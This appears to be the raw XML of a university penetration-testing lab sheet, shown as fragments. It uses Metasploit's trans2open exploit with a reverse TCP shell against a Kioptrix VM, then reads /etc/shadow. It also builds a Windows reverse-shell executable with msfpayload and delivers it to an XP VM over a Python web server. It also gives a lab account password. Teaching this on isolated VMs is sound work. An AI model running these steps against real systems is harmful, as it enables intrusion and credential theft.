    <w:p w14:paraId="29631711" w14:textId="77777777" w:rsidR="00F53E86" w:rsidRPr="00F53E86" w:rsidRDefault="00BB5AFE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Set the RHOST if needed.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other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thing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needs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added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payload.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found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 w:rsidR="00743532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5978A9B6" w14:textId="77777777" w:rsidR="00F53E86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show payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05139059" w14:textId="77777777" w:rsidR="00743532" w:rsidRPr="00276483" w:rsidRDefault="00743532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search payload/</w:t>
      </w:r>
      <w:r w:rsidR="00174DE7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>generic</w:t>
      </w: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/shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A956904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Look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reverse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177AE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>There is a nice one near the end of the list. T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177AE9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30EAB19F" w14:textId="77777777" w:rsidR="00F53E86" w:rsidRDefault="00174DE7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set payload generic/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00177AE9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shell_reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="36ACDB35" w14:textId="77777777" w:rsidR="00177AE9" w:rsidRPr="00276483" w:rsidRDefault="00A644B7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show </w:t>
      </w:r>
      <w:r w:rsidR="00177AE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20624DCF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764FB199" w14:textId="77777777" w:rsidR="00F53E86" w:rsidRDefault="0059437A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Kali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linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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LHOST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(local host)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so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LHOST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Kali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Linux’s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IP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address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. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5D2BA6" w14:textId="77777777" w:rsidR="00A644B7" w:rsidRPr="00F53E86" w:rsidRDefault="00A644B7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set </w:t>
      </w:r>
      <w:r w:rsidR="00276483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LHOST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177AE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>192.168.1</w:t>
      </w:r>
      <w:r w:rsidR="00041588">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>00</w:t>
      </w:r>
      <w:r w:rsidR="00177AE9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  <w:r w:rsidR="008E323D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13605CE5" w14:textId="77777777" w:rsidR="00BB5AFE" w:rsidRPr="00BB5AFE" w:rsidRDefault="003157E9" w:rsidP="00BB5AF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i/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="00021C27">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:i/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>prompt should be:</w:t>
      </w:r>
      <w:r w:rsidRPr="00021C27">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BB5AFE"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>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BB5AFE"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 xml:space="preserve"> exploit(</w:t>
      </w:r>
      <w:r w:rsidR="00BB5AFE" w:rsidRPr="008E323D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:highlight w:val="black"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>trans2open</w:t>
      </w:r>
      <w:r w:rsidR="00BB5AFE"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>) &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D86BA5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settings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</w:p>
    <w:p w14:paraId="73A68A74" w14:textId="77777777" w:rsidR="00F53E86" w:rsidRPr="00276483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lastRenderedPageBreak/>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571A8B89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3067E94D" w14:textId="77777777" w:rsidR="001D0D0F" w:rsidRPr="00F53E86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1D6E0358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11) Check for root privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20830EAD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check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root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privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED6D62B" w14:textId="77777777" w:rsidR="00F53E86" w:rsidRDefault="009E3E0E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w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hoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="72E308DC" w14:textId="77777777" w:rsidR="00BB5AFE" w:rsidRDefault="00BB5AFE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cat /</w:t>
      </w:r>
      <w:r w:rsidR="008E323D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etc/</w:t>
      </w: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shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD7C694" w14:textId="77777777" w:rsidR="001D0D0F" w:rsidRPr="00276483" w:rsidRDefault="001D0D0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12E9C98D" w14:textId="77777777" w:rsidR="00F53E86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12) Shutdown </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0059437A" w:rsidRPr="001D0D0F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>Kioptrix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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and start </w:t>
      </w:r>
      <w:r w:rsidR="00856BB6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>W</w:t>
      </w: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indows </w:t>
      </w:r>
      <w:r w:rsidR="00276483" w:rsidRPr="001D0D0F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>XP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE5D907" w14:textId="77777777" w:rsidR="009C55BA" w:rsidRDefault="009C55BA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</w:p>
    <w:p w14:paraId="65C39ADC" w14:textId="77777777" w:rsidR="008E323D" w:rsidRDefault="009C55B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(in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msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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>)</w:t>
      </w:r>
      <w:r w:rsidRP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8E323D" w:rsidRP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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E323D" w:rsidRP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sbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E323D" w:rsidRP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/shutdown now</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C18E867" w14:textId="77777777" w:rsidR="009C55BA" w:rsidRPr="009C55BA" w:rsidRDefault="009C55B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(in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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>)</w:t>
      </w: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&lt;Ctrl&gt;+C, y               </w:t>
      </w:r>
      <w:r w:rsidRPr="009C55BA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>//abort session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02988247" w14:textId="77777777" w:rsidR="008E323D" w:rsidRDefault="008E323D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(in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>Kioptrix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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VM)</w:t>
      </w:r>
      <w:r w:rsidRP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9C55BA" w:rsidRP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P</w:t>
      </w:r>
      <w:r w:rsid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layer/ Power / Shutdown Guest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCA7C84" w14:textId="77777777" w:rsidR="009C55BA" w:rsidRPr="009C55BA" w:rsidRDefault="00AF6558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noProof/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30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C7F31" wp14:editId="75E85815">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4535424</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>98856</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1550670" cy="672465"/>
                <wp:effectExtent l="1619250" t="0" r="11430" b="1333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672465"/>
                        </a:xfrm>
                        <a:prstGeom prst="wedgeRoundRectCallout">
                          <a:avLst>
                            <a:gd name="adj1" fmla="val -151978"/>
                            <a:gd name="adj2" fmla="val 4400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ED613" w14:textId="77777777" w:rsidR="00AF6558" w:rsidRDefault="00AF6558" w:rsidP="00AF6558">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">You may have to re-start </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>msfconsole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3C7F3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34" type="#_x0000_t62" style="position:absolute;margin-left:357.1pt;margin-top:7.8pt;width:122.1pt;height:5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" adj="-22027,20306" fillcolor="#5b9bd5 [3204]" strokecolor="#1f4d78 [1604]" strokeweight="1pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="17FED613" w14:textId="77777777" w:rsidR="00AF6558" w:rsidRDefault="00AF6558" w:rsidP="00AF6558">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">You may have to re-start </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>msfconsole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6179991" w14:textId="77777777" w:rsidR="001D0D0F" w:rsidRPr="00BB5AFE" w:rsidRDefault="00BB5AFE" w:rsidP="00F53E86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30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5AFE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="52"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>Part 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526B1057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13) Explore </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D0D0F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>MSFpayload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="705EAA13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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00276483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MSFpayload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generate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BB5AFE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>so 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without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need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framework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7AAF9E40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options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msfpayload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3E56E720" w14:textId="77777777" w:rsidR="00F53E86" w:rsidRDefault="00276483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–h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26ED836E" w14:textId="77777777" w:rsidR="001D0D0F" w:rsidRPr="00276483" w:rsidRDefault="001D0D0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00D7CD69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14) Generate a reverse shell payload using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D0D0F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>MSFPayload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="71EFDC54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list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276483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–l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flag,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like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so:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E482A6" w14:textId="77777777" w:rsidR="00F53E86" w:rsidRPr="00276483" w:rsidRDefault="00276483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–l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E74CA2E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Too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many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options?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Let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276483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grep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refine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</w:p>
    <w:p w14:paraId="117D498A" w14:textId="77777777" w:rsidR="00F53E86" w:rsidRPr="006F0C65" w:rsidRDefault="006F0C65" w:rsidP="006F0C65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–l | grep windows</w:t>
      </w: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/shell/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0E7AEC4E" w14:textId="77777777" w:rsidR="00F53E86" w:rsidRPr="00F53E86" w:rsidRDefault="006F0C65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w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ill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sufficient</w:t>
      </w:r>
      <w:r w:rsidR="003E0A5A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this.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Putting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end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of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1CC83684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list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available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options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E0390C" w14:textId="77777777" w:rsidR="00F53E86" w:rsidRPr="006F0C65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windows/shell/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reverse_tcp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S</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF96C0E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options.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Remember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always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check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have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been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applied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1EB3481A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correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE1E064" w14:textId="77777777" w:rsidR="00F53E86" w:rsidRDefault="00C74EA1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r w:rsid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windows/shell/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reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsid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LHOST=192.168.1</w:t>
      </w:r>
      <w:r w:rsidR="00041588">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>00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.200 LPORT=</w:t>
      </w:r>
      <w:r w:rsidR="00840B4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4444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S</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6A3918" w14:textId="77777777" w:rsidR="006F0C65" w:rsidRPr="006F0C65" w:rsidRDefault="006F0C65" w:rsidP="00F53E86">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i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i/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>(all on one line)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781CFC3F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compile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6F0C65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exe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windows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</w:p>
    <w:p w14:paraId="0B05F560" w14:textId="77777777" w:rsidR="00F53E86" w:rsidRPr="006F0C65" w:rsidRDefault="009C55B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noProof/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30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8234C" wp14:editId="1ABF1C9D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4637837</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>285039</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1550670" cy="672465"/>
                <wp:effectExtent l="1619250" t="0" r="11430" b="1333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672465"/>
                        </a:xfrm>
                        <a:prstGeom prst="wedgeRoundRectCallout">
                          <a:avLst>
                            <a:gd name="adj1" fmla="val -151978"/>
                            <a:gd name="adj2" fmla="val 4400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B0F54" w14:textId="77777777" w:rsidR="009C55BA" w:rsidRDefault="009C55BA" w:rsidP="009C55BA">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>Press enter a couple of times here to clear the screen a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8234C" id="Rounded Rectangular Callout 9" o:spid="_x0000_s1035" type="#_x0000_t62" style="position:absolute;margin-left:365.2pt;margin-top:22.45pt;width:122.1pt;height:5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" adj="-22027,20306" fillcolor="#5b9bd5 [3204]" strokecolor="#1f4d78 [1604]" strokeweight="1pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="64CB0F54" w14:textId="77777777" w:rsidR="009C55BA" w:rsidRDefault="009C55BA" w:rsidP="009C55BA">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>Press enter a couple of times here to clear the screen a bit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6F0C65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windows/shell/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reverse_tcp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LHOST=192.168.1</w:t>
      </w:r>
      <w:r w:rsidR="001F1037">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>00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.200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA31A58" w14:textId="77777777" w:rsidR="00F53E86" w:rsidRPr="006F0C65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LPORT=</w:t>
      </w:r>
      <w:r w:rsidR="00840B4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4444</w:t>
      </w:r>
      <w:r w:rsidR="006F0C65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X</w:t>
      </w:r>
      <w:r w:rsid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6F0C65" w:rsidRPr="006F0C65">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>(all on one line)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5236A431" w14:textId="77777777" w:rsidR="009C55BA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Seeing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terminal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doesn’t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help.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1545E051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lastRenderedPageBreak/>
        <w:t>Let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output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file</w:t>
      </w:r>
      <w:r w:rsid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34BB4836" w14:textId="77777777" w:rsidR="00F53E86" w:rsidRPr="006F0C65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windows/shell/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reverse_tcp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LHOST=192.168.1</w:t>
      </w:r>
      <w:r w:rsidR="001F1037">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>00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.200 </w:t>
      </w:r>
      <w:r w:rsidR="00E24C8B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LPORT=</w:t>
      </w:r>
      <w:r w:rsidR="00840B4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4444</w:t>
      </w:r>
      <w:r w:rsidR="00E24C8B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X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCE0FB8" w14:textId="77777777" w:rsidR="00F53E86" w:rsidRDefault="00F53E86" w:rsidP="00F53E86">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i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&gt; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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assignment1.exe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 </w:t>
      </w:r>
      <w:r w:rsidR="006F0C65" w:rsidRPr="006F0C65">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="006F0C65" w:rsidRPr="006F0C65">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>all on one line)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3DBFFC" w14:textId="77777777" w:rsidR="001D0D0F" w:rsidRPr="00F53E86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2EFB24F4" w14:textId="77777777" w:rsidR="00F53E86" w:rsidRPr="001D0D0F" w:rsidRDefault="00624674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96C35" wp14:editId="5478F76F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4154830</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>9144</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2179320" cy="965200"/>
                <wp:effectExtent l="609600" t="0" r="11430" b="2540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65200"/>
                        </a:xfrm>
                        <a:prstGeom prst="wedgeRoundRectCallout">
                          <a:avLst>
                            <a:gd name="adj1" fmla="val -76218"/>
                            <a:gd name="adj2" fmla="val -49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D5CC8" w14:textId="77777777" w:rsidR="005C0EF7" w:rsidRDefault="005C0EF7" w:rsidP="00624674">
                            <w:pPr>
                              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">*Open a second </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00624674">
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:b/>
                                <w:color w:val="0070C0"/>
                                <w:sz w:val="30"/>
                                <w:szCs w:val="30"/>
                                <w:lang w:eastAsia="en-AU"/>
                              </w:rPr>
                              <w:t>terminal</w:t>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve"> window in Kali and start the server from there. You will need to enter the user password again (COS30015user).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96C35" id="Rounded Rectangular Callout 10" o:spid="_x0000_s1036" type="#_x0000_t62" style="position:absolute;margin-left:327.15pt;margin-top:.7pt;width:171.6pt;height:7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" adj="-5663,9730" fillcolor="#5b9bd5 [3204]" strokecolor="#1f4d78 [1604]" strokeweight="1pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7C8D5CC8" w14:textId="77777777" w:rsidR="005C0EF7" w:rsidRDefault="005C0EF7" w:rsidP="00624674">
                      <w:pPr>
                        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">*Open a second </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00624674">
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:b/>
                          <w:color w:val="0070C0"/>
                          <w:sz w:val="30"/>
                          <w:szCs w:val="30"/>
                          <w:lang w:eastAsia="en-AU"/>
                        </w:rPr>
                        <w:t>terminal</w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve"> window in Kali and start the server from there. You will need to enter the user password again (COS30015user).</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00F53E86" w:rsidRPr="001D0D0F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>Step 15) Run the python mini web server</w:t>
      </w:r>
      <w:r w:rsidR="005C0EF7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C56899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distribute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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774AAC1E" w14:textId="77777777" w:rsidR="00F53E86" w:rsidRDefault="005C0EF7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6F0C65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p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ython –m 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SimpleHTTPServer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80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B9E287" w14:textId="77777777" w:rsidR="001D0D0F" w:rsidRPr="006F0C65" w:rsidRDefault="001D0D0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2434109D" w14:textId="77777777" w:rsidR="003157E9" w:rsidRDefault="00F53E86" w:rsidP="003157E9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16) </w:t>
      </w:r>
      <w:r w:rsidR="003157E9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>Shift over to the XP</w:t>
      </w:r>
      <w:r w:rsidR="003157E9"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</w:t>
      </w:r>
      <w:r w:rsidR="003157E9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6E1A05" w14:textId="77777777" w:rsidR="003157E9" w:rsidRDefault="003157E9" w:rsidP="003157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In Windows XP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web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browser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, n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avigate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address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Kali.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E91A7E" w14:textId="77777777" w:rsidR="003157E9" w:rsidRPr="00050127" w:rsidRDefault="003157E9" w:rsidP="003157E9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050127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http://192.168.100.200 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AA242C" w14:textId="77777777" w:rsidR="003157E9" w:rsidRDefault="003157E9" w:rsidP="003157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353A8201" w14:textId="77777777" w:rsidR="003157E9" w:rsidRDefault="003157E9" w:rsidP="003157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You will see a file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called  </w:t>
      </w:r>
      <w:r w:rsidRPr="005C0EF7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>assignment1.exe</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="209A27EC" w14:textId="77777777" w:rsidR="003157E9" w:rsidRDefault="003157E9" w:rsidP="003157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Don’t click on it just yet…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FA4E1E" w14:textId="77777777" w:rsidR="003157E9" w:rsidRPr="00F53E86" w:rsidRDefault="003157E9" w:rsidP="003157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2193B662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17) Setup handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC88D24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MSF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handy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handler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pre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-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generated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payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADB791E" w14:textId="77777777" w:rsidR="003157E9" w:rsidRPr="005C0EF7" w:rsidRDefault="003157E9" w:rsidP="003157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5C0EF7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(in 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the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C0EF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>msf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terminal:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C0EF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
